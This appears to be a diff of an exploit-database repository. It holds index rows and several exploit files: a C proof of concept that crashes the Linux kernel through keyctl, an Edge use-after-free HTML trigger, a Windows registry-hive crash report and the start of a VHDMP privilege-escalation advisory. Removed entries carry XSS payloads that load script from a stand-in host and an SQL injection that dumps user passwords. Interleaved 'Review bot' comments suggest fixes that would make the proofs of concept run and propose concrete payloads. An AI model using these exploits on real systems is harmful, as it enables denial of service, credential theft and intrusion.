27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0
27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0
27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - Title Field HTML Injection",2006-03-06,Kiki,php,webapps,0
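Review bot: the five phpArcadeScript 2.0 cross-site scripting rows (27349 to 27353) are dropped from the index with no replacement row and no reason recorded. EDB ids are cited from outside this repository, so the removal should say why (duplicate, invalid, or consolidated); the deleted source files further down carry only the SecurityFocus BID 16957 summary and the proof-of-concept URLs, which does not by itself explain the removal.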
@ -29116,7 +29119,6 @@ id,file,description,date,author,platform,type,port
28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0
28054,platforms/php/webapps/28054.txt,"WordPress Plugin IndiaNIC Testimonial - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0
27707,platforms/php/webapps/27707.txt,"I-RATER Platinum - Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0
27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 - EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0
27709,platforms/php/webapps/27709.txt,"4homepages 4Images 1.7 - member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0
27710,platforms/php/webapps/27710.txt,"W2B Online Banking - SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0
27975,platforms/php/webapps/27975.txt,"Bookmark4U 2.0 - inc/common.php env[include_prefix] Parameter Remote File Inclusion",2006-06-05,SnIpEr_SA,php,webapps,0
@ -30084,7 +30086,6 @@ id,file,description,date,author,platform,type,port
29049,platforms/php/webapps/29049.txt,"BlogTorrent Preview 0.92 - Announce.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29050,platforms/php/webapps/29050.txt,"Odysseus Blog 1.0 - blog.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29051,platforms/php/webapps/29051.txt,"Sphpblog 0.8 - Multiple Cross-Site Scripting Vulnerabilities",2006-11-16,the_Edit0r,php,webapps,0
29052,platforms/php/webapps/29052.txt,"Bloo 1.00 - Googlespell_Proxy.php Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
29053,platforms/asp/webapps/29053.txt,"Image Gallery with Access Database - dispimage.asp id Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
29054,platforms/asp/webapps/29054.txt,"Image Gallery with Access Database - default.asp Multiple Parameter SQL Injection",2006-11-16,"Aria-Security Team",asp,webapps,0
29055,platforms/php/webapps/29055.txt,"Eggblog 3.1 - admin/articles.php edit Parameter Cross-Site Scripting",2006-11-16,the_Edit0r,php,webapps,0
@ -31429,7 +31430,6 @@ id,file,description,date,author,platform,type,port
31162,platforms/php/webapps/31162.txt,"okul siteleri 'com_mezun' Component - SQL Injection",2008-02-12,S@BUN,php,webapps,0
31164,platforms/php/webapps/31164.txt,"Prince Clan Chess Club 0.8 com_pcchess Component - 'user_id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
31258,platforms/ios/webapps/31258.txt,"SimplyShare 1.4 iOS - Multiple Vulnerabilities",2014-01-29,Vulnerability-Lab,ios,webapps,0
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
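Review bot: the removed 31334 (Mitra Informatika Solusindo Cart, 'p' Parameter SQL Injection, bius, 2008-03-04) duplicates 5214 in the hunk at 18354 (same product, author and date), so dropping it is justified. Consider carrying the more specific "'p' Parameter SQL Injection" wording over to 5214, whose description currently reads only "SQL Injection".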

platforms/linux/dos/40762.c Executable file

@ -0,0 +1,198 @@
/*
OS-S Security Advisory 2016-21
Local DoS: Linux Kernel Nullpointer Dereference via keyctl
Date:
October 31th, 2016
Authors:
Sergej Schumilo, Ralf Spenneberg, Hendrik Schwartke
CVE:
Not yet assigned
CVSS:
4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C)
Severity:
Potentially critical. If the kernel is compiled with the option
Panic-On-Oops, this vulnerability may lead to a kernel panic.
Ease of Exploitation:
Trivial
Vulnerability Type:
Local unprivileged kernel nullpointer dereference
Abstract:
A malicious interaction with the keyctl usermode interface allows an
attacker to crash the kernel. Processing the attached certificate by the
kernel leads to a kernel nullpointer dereference. This vulnerably can be
triggered by any unprivileged user locally.
Detailed product description:
We have verified the bug on the following kernel builds:
Ubuntu Server 16.10 (GNU/Linux 4.8.0-22-generic x86_64)
RedHat Kernel 3.10.0-327.18.2.el7.x86_64
Vendor Communication:
We contacted RedHat on June, 06th 2016.
To this day, no security patch was provided by the vendor.
We publish this Security Advisory in accordance with our responsible
disclosure policy.
Reference: https://bugzilla.redhat.com/show_bug.cgi?id=1343162
Proof of Concept:
As a proof of concept, we are providing a sample exploit program and the
associated certificate.
Severity and Ease of Exploitation:
The vulnerability can be easily exploited by an unprivileged user using
our proof of concept.
dmesg-Report:
[ 40.067569] BUG: unable to handle kernel NULL pointer dereference at
(null)
[ 40.068251] IP: [<ffffffff81341911>] mpi_powm+0x31/0x9b0
[ 40.068710] PGD c853067 PUD 186bd067 PMD 0
[ 40.069090] Oops: 0002 [#1] KASAN
[ 40.069384] Modules linked in: kafl_vuln_test(OE) ext4(OE)
mbcache(OE) jbd2(OE)
[ 40.070043] CPU: 0 PID: 143 Comm: guest_interface Tainted: G
OE 4.4.0 #158
[ 40.070666] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996),
BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
[ 40.071533] task: ffff88001864b100 ti: ffff88000c880000 task.ti:
ffff88000c880000
[ 40.072117] RIP: 0010:[<ffffffff81341911>] [<ffffffff81341911>]
mpi_powm+0x31/0x9b0
[ 40.072743] RSP: 0018:ffff88000c887bf0 EFLAGS: 00010246
[ 40.073165] RAX: 0000000000000020 RBX: 0000000000000020 RCX:
ffff8800186b33f0
[ 40.073727] RDX: ffff8800186b3930 RSI: ffff8800186b32a0 RDI:
ffff8800186b37e0
[ 40.074481] RBP: ffff88000c887cc0 R08: ffff880010000c00 R09:
ffffed00030d6700
[ 40.075049] R10: ffffea000061ace0 R11: ffff880010000c08 R12:
0000000000000000
[ 40.075616] R13: ffff8800186b37e0 R14: 0000000000000000 R15:
ffff8800186b32a0
[ 40.076174] FS: 0000000000911880(0063) GS:ffffffff81c2f000(0000)
knlGS:0000000000000000
[ 40.076815] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
[ 40.077266] CR2: 0000000000000000 CR3: 000000000c817000 CR4:
00000000000006f0
[ 40.077850] Stack:
[ 40.078018] 0000000000000001 ffffea0000321000 0000000000000000
ffff8800100026c0
[ 40.078646] ffffffff8118dff6 ffff8800186b37ff ffffffff8118dff6
ffff8800186b37ff
[ 40.079286] 1ffff100030d6700 ffff88000c887c58 ffffffff8118e06e
ffff8800185c95f8
[ 40.079925] Call Trace:
[ 40.080129] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
[ 40.080642] [<ffffffff8118dff6>] ? kasan_unpoison_shadow+0x36/0x50
[ 40.081139] [<ffffffff8118e06e>] ? kasan_kmalloc+0x5e/0x70
[ 40.081582] [<ffffffff81342320>] ? mpi_alloc+0x20/0x80
[ 40.082006] [<ffffffff812cee6c>] ? RSA_verify_signature+0x36c/0xf60
[ 40.082512] [<ffffffff812ceec5>] RSA_verify_signature+0x3c5/0xf60
[ 40.083001] [<ffffffff812ceb00>] ? public_key_describe+0x160/0x160
[ 40.083507] [<ffffffff812ce5c5>] public_key_verify_signature+0x785/0xb20
[ 40.084043] [<ffffffff812d5bad>] x509_check_signature+0x9d/0x320
[ 40.084531] [<ffffffff812d6461>] x509_key_preparse+0x631/0x1210
[ 40.085014] [<ffffffff812cbe1a>] ? asymmetric_key_preparse+0x26a/0x530
[ 40.085534] [<ffffffff812cbce7>] asymmetric_key_preparse+0x137/0x530
[ 40.086981] [<ffffffff8126b8fb>] ? key_type_lookup+0x4b/0x80
[ 40.087437] [<ffffffff8126ba67>] key_create_or_update+0x137/0x450
[ 40.087942] [<ffffffff8126d2e7>] SyS_add_key+0x117/0x200
[ 40.088381] [<ffffffff81741d33>] entry_SYSCALL_64_fastpath+0x16/0x75
[ 40.088890] Code: 41 56 41 55 41 54 53 48 81 ec a8 00 00 00 8b 41 04
44 8b 72 04 4c 8b 67 18 85 c0 89 45 a4 0f 84 da 07 00 00 45 85 f6 75 38
89 c3 <49> c7 04 24 01 00 00 00 b8 01 00 00 00 83 fb 01 0f 84 84 01 00
[ 40.091203] RIP [<ffffffff81341911>] mpi_powm+0x31/0x9b0
[ 40.091645] RSP <ffff88000c887bf0>
[ 40.091924] CR2: 0000000000000000
[ 40.092207] ---[ end trace 3d4c5681d47247c7 ]---
[ 40.092566] Kernel panic - not syncing: Fatal exception
[ 40.092968] Kernel Offset: disabled
[ 40.093242] Rebooting in 1 seconds..
Proof of Concept (Code):
*/
/*
*
* base64 -d < certificate.base64 > test.crt
* gcc test.crt -lkeyutils
* ./a.out
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <string.h>
#include <sys/mount.h>
#include <errno.h>
#include <signal.h>
#include <keyutils.h>
int main(){
FILE *infile;
char *buffer;
long numbytes;
key_serial_t key_id;
key_serial_t keyring_id;
infile = fopen("test.crt", "r");
if(infile == NULL)
return 1;
fseek(infile, 0L, SEEK_END);
numbytes = ftell(infile);
fseek(infile, 0L, SEEK_SET);
buffer = (char*)calloc(numbytes, sizeof(char));
if(buffer == NULL)
return 1;
fread(buffer, sizeof(char), numbytes, infile);
fclose(infile);
/* inject fuzzed x509 DER data into asymmetric crypto kernel code */
key_id = add_key("asymmetric", "", buffer, numbytes, 0xfffffffd);
printf("Oops?!\n");
if(key_id != -1){
keyctl_unlink(key_id, 0xfffffffd);
}
free(buffer);
return 0;
}
/*
Proof of Concept (Certificate):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--
*/
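Review bot: the build instructions in the header comment, `gcc test.crt -lkeyutils`, compile the decoded certificate instead of the C source; the file being added is 40762.c, so it should be `gcc 40762.c -lkeyutils`, with test.crt only read at run time through fopen("test.crt", "r"). In main(), the ftell() and fread() return values are never checked, so a seek failure or short read would hand add_key() a partially zeroed buffer; test for numbytes < 0 and compare the fread() result with numbytes before the call. The magic value 0xfffffffd passed to add_key() and keyctl_unlink() is KEY_SPEC_SESSION_KEYRING (-3); naming the constant from <keyutils.h> would make the target keyring explicit. Minor text points in the advisory block: "October 31th" should be "October 31st", and "This vulnerably can be triggered" should read "This vulnerability can be triggered".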

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/tellafriend.php?about=game&gamename=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/admin/loginbox.php?loginstatus=1&login_status=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/index.php?action=tradelinks&submissionstatus=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

@ -1,10 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/browse.php?cell_title_background_color=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3\E
http://www.example.com/includes/browse.php?browse_cat_id=1&browse_cat_name=%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E

@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/16957/info
phpArcadeScript is prone to multiple cross-site scripting vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Version 2.0 is vulnerable to these issues; other versions may also be affected.
http://www.example.com/includes/displaygame.php?filetype=1&gamefile=%22%3E%3CSCRIPT%20SRC=http://www.example2.com/xss.js%3E%3C/SCRIPT%3E
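Review bot: the `gamefile` payload starts with `%22%3E`, so the sink is a double-quoted HTML attribute rather than text content, yet the removed advisory text only says 'lack of proper sanitization of user-supplied input' and never names the parameter or its context. Whichever entry replaces this should state that `includes/displaygame.php` reflects `gamefile` into an attribute value, and that the PoC passes `filetype=1` alongside it, since that is the request shape the vector was recorded with.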


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/17624/info
EasyGallery is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/EasyGallery.php?ordner=XSS
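Review bot: the EasyGallery entry being removed carries no working payload and no version: `EasyGallery.php?ordner=XSS` uses the literal placeholder `XSS`, `[path]` is left unfilled, and nothing in the hunk shows where `ordner` is reflected. If this removal is a cleanup of unverifiable entries the deletion is consistent; if it is a merge, the target entry needs a concrete script payload (for example `%3Cscript%3Ealert(1)%3C/script%3E`), the affected version, and the output context before it is worth keeping.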


@ -1,9 +0,0 @@
source: http://www.securityfocus.com/bid/21130/info
Bloo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Version 1.00 is vulnerable to this issue; other versions may also be affected.
http://www.example.com/extensions/googiespell/googlespell_proxy.php?lang=[xss]
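Review bot: the PoC `extensions/googiespell/googlespell_proxy.php?lang=[xss]` uses the `[xss]` placeholder instead of a concrete payload, and the path shows the sink is the googiespell spell-check proxy shipped under `extensions/`, not code specific to Bloo 1.00. A merged or re-added entry should carry a real payload for `lang` and name the bundled proxy script, so the same file can be checked in any other application that ships it rather than being filed only under Bloo.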


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/28096/info
Mitra Informatika Solusindo Cart is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?c=10&p=-7%20union%20select%200,concat(user_name,user_password),null,null,null,null,null,null%20from%20tbl_agen--
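Review bot: the deleted text names neither the injection point nor the query shape, yet the PoC URL fixes both: `p=-7 union select 0,concat(user_name,user_password),null,null,null,null,null,null from tbl_agen--` shows that `p` in `index.php` lands in an 8-column SELECT, that the negative id is used to empty the legitimate row so the UNION row is what gets rendered, and that the trailing `--` comments out the rest of the original statement. Whatever entry replaces this should state the parameter (`p`), the column count and the `tbl_agen` / `user_name` / `user_password` names explicitly instead of the generic 'fails to sufficiently sanitize user-supplied data' wording, and should flag `c=10` as untested, since the PoC only exercises `p`.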

platforms/windows/dos/40761.html Executable file

@ -0,0 +1,182 @@
<!--
Source: http://blog.skylined.nl/20161115001.html
Synopsis
A specially crafted web-page can cause Microsoft Edge to free memory used for a CAttr­Array object. The code continues to use the data in freed memory block immediately after freeing it. It does not appear that there is enough time between the free and reuse to exploit this issue.
Known affected software and attack vectors
Microsoft Edge 11.0.10240.16384
An attacker would need to get a target user to open a specially crafted web-page. Java­Script is not necessarily required to trigger the issue.
Repro
<x style="
background-image: inherit;
text-decoration: line-through;
height: 0;
width: 0;
top: 0;
left: 0;
right: 0;
bottom: 0;
font: menu;">
Alternatively:
<body id=x style=margin:5 onload=x.style.remove­Property("margin")>
Description
When an element is created and style properties are added, these are stored in a CAttr­Array object. A new CAttr­Array is able to store up to 8 properties. If more properties need to be stored, the code will allocate memory for a larger CAttr­Array and copy the existing properties into this new object before freeing the old memory. The code will then continue to use the freed memory almost immediately. In the first repro, the "font" style property is the ninth property and triggers this issue. In the second repro, the only property of a CAttr­Array is removed, at which point it is freed but no new object is allocated. However, the code follows the same path and also reuses the freed memory.
Exploit
What little investigation I did appears to indicate that there is no way to reallocate the freed memory before its reuse. It is therefore probably not possible to exploit this issue that way. I did not investigate how the freed memory is used by the code exactly, and I did not look into other methods to exploit the issue. I did create a second repro that triggers the issue "on-demand" from Javascript but, as is to be expected, no Javascript is executed between the free and the re-use.
-->
<x id=x style="background-image: inherit;text-decoration: line-through;height: 0;width: 0;top: 0;left: 0;right: 0;bottom: 0;"><script>
window.onload = function () {
// This Po­C attempts to exploit a use-after-free bug in Microsoft Edge
// See http://blog.skylined.nl/20161115001.html for details.
// The CAttr­Array is full, adding another style property will cause Edge to
// allocate a larger CAttr­Array, copy everything and free the old one.
// The old one then continues to be used almost immediately:
x.style.set­Property("font", "menu");
// This work by Sky­Lined is licensed under a Creative Commons
// Attribution-Non-Commercial 4.0 International License.
};
</script>
<!--
The code
Below you can find an annotated disassembly for the CAttr­Array::Destroy function, which calls CAttr­Array::Set (in which the memory is freed) before looping and re-using the memory. This loop shows there is very little time between the two events in which to reallocate the memory and attempt to control its contents. There also does not appear to be much this function can be made to do if the memory could be controlled.
EDGEHTML!CAttr­Array::Destroy:
6175024f 8bff mov edi,edi
61750251 55 push ebp
61750252 8bec mov ebp,esp
61750254 83e4f8 and esp,0FFFFFFF8h
61750257 83ec2c sub esp,2Ch
6175025a 8b510c mov edx,dword ptr [ecx+0Ch]
6175025d 8bc2 mov eax,edx
6175025f 53 push ebx
61750260 d1e8 shr eax,1
61750262 894c240c mov dword ptr [esp+0Ch],ecx
61750266 56 push esi
61750267 57 push edi
61750268 a801 test al,1
6175026a 0f85b56f3600 jne EDGEHTML!CAttr­Array::Destroy+0x366fd6 (61ab7225)
{
61ab7225 cc int 3
61ab7226 e94590c9ff jmp EDGEHTML!CAttr­Array::Destroy+0x21 (61750270)
}
61750270 8b5d08 mov ebx,dword ptr [ebp+8]
61750273 8d7c2428 lea edi,[esp+28h]
61750277 c1e304 shl ebx,4
6175027a 035908 add ebx,dword ptr [ecx+8]
6175027d 8bf3 mov esi,ebx
6175027f 803b04 cmp byte ptr [ebx],4
61750282 a5 movs dword ptr es:[edi],dword ptr [esi]
61750283 a5 movs dword ptr es:[edi],dword ptr [esi]
61750284 a5 movs dword ptr es:[edi],dword ptr [esi]
61750285 a5 movs dword ptr es:[edi],dword ptr [esi]
61750286 752d jne EDGEHTML!CAttr­Array::Destroy+0x66 (617502b5)
{
617502b5 8bcb mov ecx,ebx
617502b7 e870e4ffff call EDGEHTML!CAttr­Value::Get­DISPID (6174e72c)
617502bc 8b742414 mov esi,dword ptr [esp+14h]
617502c0 8bca mov ecx,edx
617502c2 c1e004 shl eax,4
617502c5 83e20f and edx,0Fh
617502c8 2bc8 sub ecx,eax
617502ca 83e1f0 and ecx,0FFFFFFF0h
617502cd 0bca or ecx,edx
617502cf 894e0c mov dword ptr [esi+0Ch],ecx
617502d2 0fb74302 movzx eax,word ptr [ebx+2]
617502d6 a808 test al,8
617502d8 752c jne EDGEHTML!CAttr­Array::Destroy+0xb7 (61750306)
{
617502da 8b560c mov edx,dword ptr [esi+0Ch] ;<--------------.
617502dd f6c208 test dl,8 ; \
617502e0 0f95c1 setne cl ; |
617502e3 f6430201 test byte ptr [ebx+2],1 ; REUSE |
617502e7 0f95c0 setne al ; |
617502ea 84c8 test al,cl ; |
617502ec 8bce mov ecx,esi ; |
617502ee 7498 je EDGEHTML!CAttr­Array::Destroy+0x39 (61750288) ; >----, |
617502f0 b301 mov bl,1 ; | |
617502f2 eb96 jmp EDGEHTML!CAttr­Array::Destroy+0x3b (6175028a) ; >--- | --. |
} ; | | |
61750306 803b09 cmp byte ptr [ebx],9 ; | | /|
61750309 74cf je EDGEHTML!CAttr­Array::Destroy+0x8b (617502da) ; >--- | - | --' |
6175030b 8d442418 lea eax,[esp+18h] ; | | |
6175030f 8bcb mov ecx,ebx ; | | |
61750311 50 push eax ; | | |
61750312 e89efeffff call EDGEHTML!CAttr­Value::Get­As­Variant­NC (617501b5) ; | | |
61750317 0fb74b02 movzx ecx,word ptr [ebx+2] ; | | |
6175031b 81e1efff0000 and ecx,0FFEFh ; | | |
61750321 f6430380 test byte ptr [ebx+3],80h ; | | |
61750325 7526 jne EDGEHTML!CAttr­Array::Destroy+0xfe (6175034d) ; | | |
{ ; | | |
6175034d 33c0 xor eax,eax ; V V ^
6175034f ebd9 jmp EDGEHTML!CAttr­Array::Destroy+0xdb (6175032a) ; | | |
} else { ; | | |
61750327 8b4304 mov eax,dword ptr [ebx+4] ; | | |
} ; | | |
6175032a 6a01 push 1 ; | | |
6175032c 6a01 push 1 ; | | |
6175032e 51 push ecx ; | | |
6175032f 6a09 push 9 ; | | |
61750331 8d4c2428 lea ecx,[esp+28h] ; | | |
61750335 51 push ecx ; | | |
61750336 50 push eax ; | | |
61750337 8bcb mov ecx,ebx ; | | |
61750339 e8eee3ffff call EDGEHTML!CAttr­Value::Get­DISPID (6174e72c) ; | | |
6175033e 50 push eax ; | | |
6175033f 8d44242f lea eax,[esp+2Fh] ; | | |
61750343 8bce mov ecx,esi ; | | |
61750345 50 push eax ; | | |
61750346 e8258a0800 call EDGEHTML!CAttr­Array::Set (617d8d70) ; FREE | | /
6175034b eb8d jmp EDGEHTML!CAttr­Array::Destroy+0x8b (617502da) ; >--- | - | ---'
} ; | |
61750288 33db xor ebx,ebx ;<-----' |
6175028a d1ea shr edx,1 ;<---------'
6175028c f6c201 test dl,1
6175028f 0f85966f3600 jne EDGEHTML!CAttr­Array::Destroy+0x366fdc (61ab722b)
{
61ab722b cc int 3
61ab722c e96490c9ff jmp EDGEHTML!CAttr­Array::Destroy+0x46 (61750295)
}
61750295 ff7508 push dword ptr [ebp+8]
61750298 6a10 push 10h
6175029a e8b1e01400 call EDGEHTML!CImpl­Ary::Delete (6189e350)
6175029f 8d4c2428 lea ecx,[esp+28h]
617502a3 e8ae000000 call EDGEHTML!CAttr­Value::Free (61750356)
617502a8 84db test bl,bl
617502aa 7548 jne EDGEHTML!CAttr­Array::Destroy+0xa5 (617502f4)
{
617502f4 8b4c2414 mov ecx,dword ptr [esp+14h]
617502f8 6a03 push 3
617502fa 68eb030180 push 800103EBh
617502ff e8ac3e0c00 call EDGEHTML!CAttr­Array::Delete­Attribute (618141b0)
61750304 eba6 jmp EDGEHTML!CAttr­Array::Destroy+0x5d (617502ac)
}
617502ac 5f pop edi
617502ad 5e pop esi
617502ae 5b pop ebx
617502af 8be5 mov esp,ebp
617502b1 5d pop ebp
617502b2 c20400 ret 4
Time-line
September 2015: This vulnerability was found through fuzzing.
September 2015: This vulnerability was submitted to ZDI.
September 2015: This vulnerability was rejected by ZDI.
November 2016: The issue no longer reproduces in Microsoft Edge.
November 2016: Details of this issue are released.
-->
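Review bot: the executable line `x.style.set­Property("font", "menu");` (and `remove­Property` in the alternative repro) still contains the soft-hyphen character U+00AD copied from the blog post's typography, the same character visible in `CAttr­Array`, `Java­Script`, `Po­C` and `Sky­Lined` throughout the file. U+00AD is not a valid identifier character in JavaScript, so the `<script>` block fails to parse and the on-demand trigger the comment describes never fires; the characters are harmless inside the HTML comment but fatal in the script body. Strip every U+00AD from the file before committing, and consider making the no-JavaScript `<x style="... font: menu;">` form the file's default trigger, since the synopsis states JavaScript is not required and the timeline notes the issue no longer reproduces on current Edge, so the simplest repro is the more useful record.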

platforms/windows/dos/40766.txt Executable file

@ -0,0 +1,52 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=874
We have encountered a Windows kernel crash in the nt!RtlEqualSid function invoked through nt!SeAccessCheck by nt!CmpCheckSecurityCellAccess while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:
---
PAGE_FAULT_BEYOND_END_OF_ALLOCATION (cd)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: a1f11004, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 816d40b3, if non-zero, the address which referenced memory.
Arg4: 00000000, Mm internal code.
Debugging Details:
------------------
[...]
STACK_TEXT:
92bbb5e4 816f92b9 a1f11004 83af4ff0 92bbb6ac nt!RtlEqualSid+0x9
92bbb604 816d3292 00000000 20204d43 00000000 nt!RtlpOwnerAcesPresent+0x87
92bbb634 816d3cfe a1f10f50 00000001 00bbb6b0 nt!SeAccessCheckWithHint+0x178
92bbb668 818f8ff8 a1f10f50 92bbb6b0 00000000 nt!SeAccessCheck+0x2a
92bbb6c0 81820906 a75e69c8 000051d8 00000001 nt!CmpCheckSecurityCellAccess+0xe5
92bbb6fc 818206ad 03010001 92bbb728 92bbb718 nt!CmpValidateHiveSecurityDescriptors+0x1bd
92bbb73c 8182308f 03010001 80000588 8000054c nt!CmCheckRegistry+0xd8
92bbb798 817f6fa0 92bbb828 00000002 00000000 nt!CmpInitializeHive+0x55c
92bbb85c 817f7d85 92bbbbb8 00000000 92bbb9f4 nt!CmpInitHiveFromFile+0x1be
92bbb9c0 817ffaae 92bbbbb8 92bbba88 92bbba0c nt!CmpCmdHiveOpen+0x50
92bbbacc 817f83b8 92bbbb90 92bbbbb8 00000010 nt!CmLoadKey+0x459
92bbbc0c 8168edc6 0014f8a4 00000000 00000010 nt!NtLoadKeyEx+0x56c
92bbbc0c 77cc6bf4 0014f8a4 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0014f90c 00000000 00000000 00000000 00000000 0x77cc6bf4
[...]
FOLLOWUP_IP:
nt!RtlEqualSid+9
816d40b3 668b06 mov ax,word ptr [esi]
---
The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for the NT kernel (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation. In order to reproduce the problem with the provided sample, it is necessary to load it with a dedicated program which calls the RegLoadAppKey() API.
3 samples attached with single-byte differences compared to the original file, and the base sample itself.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40766.zip
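Review bot: this entry is not reproducible from the text alone: the samples live in an external zip (`40766.zip`, last line), and the text says the hive must be loaded 'with a dedicated program which calls the RegLoadAppKey() API' without including or naming that program or its arguments, or saying which byte each of the three 'single-byte differences' samples changes. Add at least the RegLoadAppKey() loader invocation (or point to it inside the zip) and a one-line description per sample. Also record the tested configuration next to the crash log: the text says the bug surfaces as an immediate crash only with Special Pool enabled and is merely observable on a default Windows 7 install, and the 8-digit stack addresses (`92bbb5e4`, `816d40b3`) show the log is from an x86 build, neither of which is stated explicitly.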

platforms/windows/local/40763.cs Executable file

@ -0,0 +1,839 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=914
Windows: VHDMP Arbitrary File Creation EoP
Platform: Windows 10 10586 and 14393. Unlikely to work on 7 or 8.1 as I think its new functionality
Class: Elevation of Privilege
Summary:
The VHDMP driver doesnt safely create files related to Resilient Change Tracking leading to arbitrary file overwrites under user control leading to EoP.
Description:
The VHDMP driver is used to mount VHD and ISO files so that they can be accessed as a normal mounted volume. In Windows 10 support was introduced for Resilient Change Tracking which adds a few new files ending with .rct and .mrt next to the root vhd. When you enable RCT on an existing VHD it creates the files if theyre not already present. Unfortunately it does it using ZwCreateFile (in VhdmpiCreateFileWithSameSecurity) and doesnt specify the OBJ_FORCE_ACCESS_CHECK flag. As the location is entirely controlled by the user we can exploit this to get an arbitrary file create/overwrite, and the code as its name suggests will copy across the DACL from the parent VHD meaning well always be able to access it.
Note this doesnt need admin rights as we never mount the VHD, just set RCT. However you cant use it in a sandbox as opening the drive goes through multiple access checks.
Proof of Concept:
